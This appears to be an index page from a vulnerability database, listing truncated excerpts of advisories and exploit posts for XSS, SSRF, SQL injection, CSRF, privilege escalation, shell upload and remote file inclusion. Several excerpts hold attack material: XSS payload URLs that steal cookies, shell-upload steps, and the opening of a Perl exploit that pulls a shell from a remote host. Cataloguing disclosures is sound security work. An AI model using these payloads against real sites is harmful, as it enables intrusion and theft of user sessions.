Stored Xss in Question field due to lack of sanitization in Link.php

Description Stored XSS Cross-Site Scripting is a type of web application vulnerability that allows an attacker to inject malicious scripts into a website or web application. Unlike reflected XSS, where the malicious script is embedded in a URL and executed immediately, stored XSS involves the...

WSVuls - Website Vulnerability Scanner Detect Issues (Outdated Server Software And Insecure HTTP Headers)

WSVuls Website vulnerability scanner detect issues outdated server software and insecure HTTP headers. What's WSVuls? WSVuls is a simple and powerful command line tool for Linux, Windows and macOS. It's designed for developers/testers and for those workers in IT who want to test vulnerabilities a...

Like Button Rating < 2.6.32 - Unauthenticated Full-Read SSRF

The LikeBtn WordPress plugin was vulnerable to Unauthenticated Full-Read Server-Side Request Forgery SSRF. On line 7493 in likebtnlikebutton.php a hook is set to allow unauthenticated ajax calls which will call the function likebtnprx. As the name suggests, this function works as a proxy and can ...

jobs.target.com XSS vulnerability

Open Bug Bounty ID: OBB-615835 Description| Value ---|--- Affected Website:| jobs.target.com Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...

target.com.br XSS vulnerability

Vulnerable URL: https://www.target.com.br/portal/asp/cadastro/opt-out.asp?email=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E=A171 Details: Description| Value ---|--- Patched:| Yes, at 26.07.2017 Latest check for patch:| 26.07.2017 10:31 GMT Vulnerability type:| XSS Vulnerability status:| Publicl...

Apple iOS cookie mishandling vulnerability

Apple iOS is the latest operating system that runs on Apple's iPhone and iPod touch devices. A security vulnerability exists in Apple iOS that allows a remote attacker to set a special cookie for the target device on the target website...

WordPress Quasar Theme <= 1.9.1 - Privilege Escalation

Because of this vulnerability, the attackers can have an administrator account on the target's website. Solution Update the theme...

WordPress Platform Theme <= 1.6.2 - Privilege Escalation

Because of this vulnerability, the attackers can have an administrator account on the target's website. Solution Update the theme...

joomla components custompages 1.1 - Remote File Inclusion Vulnerability

No description provided by source. @ JOOmla Component custompages = 1.0 Sql Remote file Inclusion Author:Sniper456 Contact:Sniper456atttgmail.com Greetss: My chilean people Developer: Shawn Sandy License:Other open source / Free license Dork: 8=====B ! = Bug:...

JForum Cross Site Request Forgery

Version : All Vulnerability : Cross-site request forgery Problem type : remote CVE ID : CVE-2013-7209 Jforum Admin module, modify user permissions module exists crsf Vulnerability,use the following code into jforum forum posts, as long as this administrators is opened this post, the permissions o...

Free Monthly Websites 2.0 Administrator Remote Password Change

========================================================================================== Title : Free Monthly Websites 2.0 Administrator Remote Password Change Date : 10/04/2013 Name : Free Monthly Websites Affected Version : 2.0 Vendor : http://www.freemonthlywebsites2.com/ Category : Web...

Free Monthly Websites 2.0 - Admin Password Change

Free Monthly Websites 2.0 - Admin Password Change ========================================================================================== Title : Free Monthly Websites 2.0 Administrator Remote Password Change Date : 10/04/2013 Name : Free Monthly Websites Affected Version : 2.0 Vendor :...

CNELE SQL Injection

By : CR9 Greetz : Perspicacious Hackers In The World . ++++++++++++++++++++++++++++++++++++++++++++++++++++++ Title : CNELE SQL Injection Vulnerability Vendor : http://www.cnele.com Author : CR9 Home : Http://Nopotm.ir Archive : http://CR9Exploits.zio.ir Email : [email protected]...

Security-Assessment.com Advisory: Oracle JRE - java.net.URLConnection class - Same-of-Origin &#40;SOP&#41; Policy Bypass

, , . .' '. ', . , '. , ., , / / / ==/ / / / / / / | Y Y / /| / /||| / / /.-. / /:wq x.0 '=.|w|.=' ='"=. presents.. Oracle JRE - java.net.URLConnection class – Same-of-Origin SOP Policy Bypass PDF: http://www.security-assessment.com/files/advisories/OracleJREjavaneturlconnectionSOPBypass.pdf CVE...

myPHPupload 0.5.1 Shell Upload

| | myPHPupload 0.5.1 Remote File Upload Vulnerability | | Author : ViRuSMaN | | Contact : [email protected] | | Home : Islam-Attack.CoM , HackTeach.OrG | | Download : http://www.graphiks.net/telecharger/myPHPupload.zip | | | | Exp : | | 1- Uoload your shell format "shell.php" | | 2- Go to The Pwd...

youtubeclone-sql.txt

|| | | Youtuber Clone UID Remote SQL Injection Vulnerability | | |---------------------Hussin X----------------------| | | Author: Hussin X | | Home : www.tryag.cc/cc | | email: darkangelg85atYahooDoTcom | | | | | | | | script : http://www.greatclone.com/productinfo.php?cPath=30&productsid=86 | |...

aproxcms-sql.txt

Viva IslaM Viva IslaM Remote SQL injection Vulnerability Aprox CMS Engine V5.1.0.4 index.php page AuTh0r : Mr.SQL H0ME : WwW.PaL-HaCkEr.CoM && WwW.AtsDp.CoM/f Email : [email protected] SYRIAN Arab HACkErS -: Exploite :-...

WIYS v1.0 Cross-Site Scripting Vulnerability - &#40;05.24.2007&#41; &#40;NEW&#41;

WIYS v1.0 Cross-Site Scripting Vulnerability - 05.24.2007 NEW Vulnerability: http://www.target.com/index.php?Page=Sayfa&No="scriptalertdocument.cookie/script Vulnerable: WIYS v1.0 Google d0rk: Bu site FORSNET taraf?ndan WIYS Yaz?l?m?™ ile haz?rlanm?st?r. Script :...

mg.applanix131.txt

!/usr/bin/perl """"""""""""""""""""""""""""""""""""""""""""""" """ :: :: ::::: :::: """ """ :: :: :: : :: """ """ :::: :: :: ::::: ::::: :::: """ """ :: :: ::: ::: :: :: :: :: :: """ """ :: :: :: : : ::::: :: :: :::: """ """ """ """"""""""""""""""""""""""""""""""""""""""""""" Xmor$ DigitaL Hackin...

phpBurningPortal 1.0.1 - &#039;lang_path&#039; Remote File Inclusion

!/usr/bin/perl use LWP::UserAgent; use LWP::Simple; $target = @ARGV0; $shellsite = @ARGV1; $shellcmd = @ARGV2; $fileno = @ARGV3; if!$target || !$shellsite usage; header; if $fileno eq 1 $file = "questdelete.php?langpath="; elsif $fileno eq 2 $file = "questedit.php?langpath="; elsif $fileno eq 3...